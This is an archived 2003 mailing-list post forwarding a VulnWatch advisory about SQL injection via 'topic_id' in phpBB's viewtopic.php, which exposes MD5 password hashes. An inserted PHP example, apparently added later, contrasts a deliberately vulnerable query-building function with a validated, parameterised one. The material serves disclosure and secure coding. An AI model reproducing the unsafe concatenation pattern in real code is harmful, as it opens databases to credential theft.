phpBB password disclosure by sql injection

ir0nkid at linuxjunkies.com ir0nkid at linuxjunkies.com
Fri Jun 20 03:43:43 CDT 2003



*heads up*

Thought I would forward this on, seeing as how it's one of the most popular
out there right now.

-------- Original Message --------
Subject: FW: phpBB password disclosure by sql injection
From: "Jacob Hurley" <jacobh at aos5.com>
To: <ir0nkid at buildtheb0x.com>, <ir0nkid at linuxjunkies.com>

   __
| / A__   Jacob Hurley           |
| __/ O  Linux+, CCNA           |
| / S__/  Alexander Open Systems |
| __/     913.307.2366           |

-----Original Message-----
From: Rick [mailto:rikul at bellsouth.net]
Sent: Thursday, June 19, 2003 2:28 AM
To: vulnwatch at vulnwatch.org
Subject: phpBB password disclosure by sql injection

Hi

There is a SQL injection vuln in phpBB. The variable "topic_id" is passed
directly from GET to a SQL query in /viewtopic.php. It can be used
to get MD5 passwords for users. I am attaching details and proof of
concept code. I've only tested this on MySQL 4 and pgsql at my home
machines, so I might have missed something...

Rick Patel
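The unsafe pattern described in the advisory (a GET value concatenated straight into the query) beside a hardened handler, as an added PHP example that is not phpBB's own code; the table name `phpbb_topics`, the PDO connection and the function names are assumptions.

```php
<?php
// Added example, not code from phpBB or from the advisory.
// Assumed table: phpbb_topics(topic_id INT, ...).

// Vulnerable: whatever the client sends as topic_id becomes part of the SQL
// text, so the database parses user input as query syntax.
function build_query_unsafe(array $get): string
{
    $topic_id = $get['topic_id'] ?? '';
    return "SELECT * FROM phpbb_topics WHERE topic_id = " . $topic_id;
}

// Hardened: the value must be a plain positive decimal integer, and it is
// bound as a typed parameter so it can never be interpreted as SQL.
function fetch_topic(PDO $db, array $get): ?array
{
    $raw = $get['topic_id'] ?? null;
    // ctype_digit rejects signs, spaces, quotes and anything non-numeric.
    if ($raw === null || !ctype_digit((string) $raw)) {
        return null;
    }
    $topic_id = (int) $raw;
    if ($topic_id <= 0) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM phpbb_topics WHERE topic_id = :topic_id');
    $stmt->bindValue(':topic_id', $topic_id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (assumed DSN): any non-integer topic_id is refused before the query
// is built, instead of reaching the database as SQL.
// $db = new PDO('mysql:host=localhost;dbname=phpbb', 'user', 'pass');
// $topic = fetch_topic($db, $_GET);
```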

More information about the Kclug mailing list